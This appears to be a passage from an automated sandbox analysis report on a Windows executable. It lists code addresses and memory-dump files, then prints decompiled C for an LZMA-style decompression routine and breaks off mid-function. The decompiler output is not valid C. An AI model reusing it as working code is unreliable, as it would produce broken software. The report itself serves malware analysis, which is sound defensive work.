0x00406ed0
0x00406ed4
0x00406ed6
0x00406ed6
0x00406ed7
0x00406eda
0x00406edd
0x00406e9f
0x00406e9f
0x00406ea7
0x00406eac
0x00406eae
0x00406eb1
0x00406eb1
0x00406ee0
0x00406ee7
0x00406e71
0x00406e71
0x00406e71
0x00406e71
0x00000000
0x00406ee9
0x00000000
0x00406ee9
0x00406ee7
0x00406dfa
0x00406dfd
0x00406dff
0x00406e02
0x00406e05
0x00406e08
0x00406e0a
0x00406e0d
0x00406e10
0x00406e10
0x00406e13
0x00406e13
0x00406e16
0x00406e1d
0x00406df1
0x00406df1
0x00406df1
0x00406df1
0x00000000
0x00406e1f
0x00000000
0x00406e1f
0x00406e1d
0x00406da3
0x00406da6
0x00406da8
0x00406dab
0x00000000
0x00000000
0x00406b0a
0x00406b0a
0x00406b0e
0x00407153
0x00000000
0x00407153
0x00406b14
0x00406b17
0x00406b1a
0x00406b1d
0x00406b20
0x00406b23
0x00406b26
0x00406b28
0x00406b2b
0x00406b2e
0x00406b31
0x00406b33
0x00406b33
0x00406b33
0x00000000
0x00000000
0x00406c95
0x00406c95
0x00406c99
0x0040715f
0x00000000
0x0040715f
0x00406c9f
0x00406ca2
0x00406ca5
0x00406ca8
0x00406caa
0x00406caa
0x00406caa
0x00406cad
0x00406cb0
0x00406cb3
0x00406cb6
0x00406cb9
0x00406cbc
0x00406cbd
0x00406cbf
0x00406cbf
0x00406cbf
0x00406cc2
0x00406cc5
0x00406cc8
0x00406ccb
0x00406ccb
0x00406ccb
0x00406cce
0x00406cd0
0x00406cd0
0x00000000
0x00000000
0x00406f12
0x00406f12
0x00406f12
0x00406f16
0x00000000
0x00000000
0x00406f1c
0x00406f1f
0x00406f22
0x00406f25
0x00406f27
0x00406f27
0x00406f27
0x00406f2a
0x00406f2d
0x00406f30
0x00406f33
0x00406f36
0x00406f39
0x00406f3a
0x00406f3c
0x00406f3c
0x00406f3c
0x00406f3f
0x00406f42
0x00406f45
0x00406f48
0x00406f4b
0x00406f4f
0x00406f51
0x00406f54
0x00000000
0x00406f56
0x00406cd3
0x00406cd3
0x00000000
0x00406cd3
0x00406f54
0x00407189
0x00000000
0x00000000
0x004067b8
0x004071c0
0x004071c0
0x00000000
0x004071c0
0x0040700d
0x00406f94
0x00406f91
0x00000000
0x00406ce6

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e7a7db026ec9aad88acaa11386c02789d7bc6b83e00ba9479abd6ecc9ecffba
Instruction ID: a9aff89c954bf491ffe4c30e494efe667c8bfb024e4a61e14b5544386b4e6ab4
Opcode Fuzzy Hash: 1e7a7db026ec9aad88acaa11386c02789d7bc6b83e00ba9479abd6ecc9ecffba
Instruction Fuzzy Hash: 47713471D04229CBDF28CF98C844BADBBB1FF48305F15806AD856BB281C7786996DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406C2E, Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406C2E() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004071C8))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
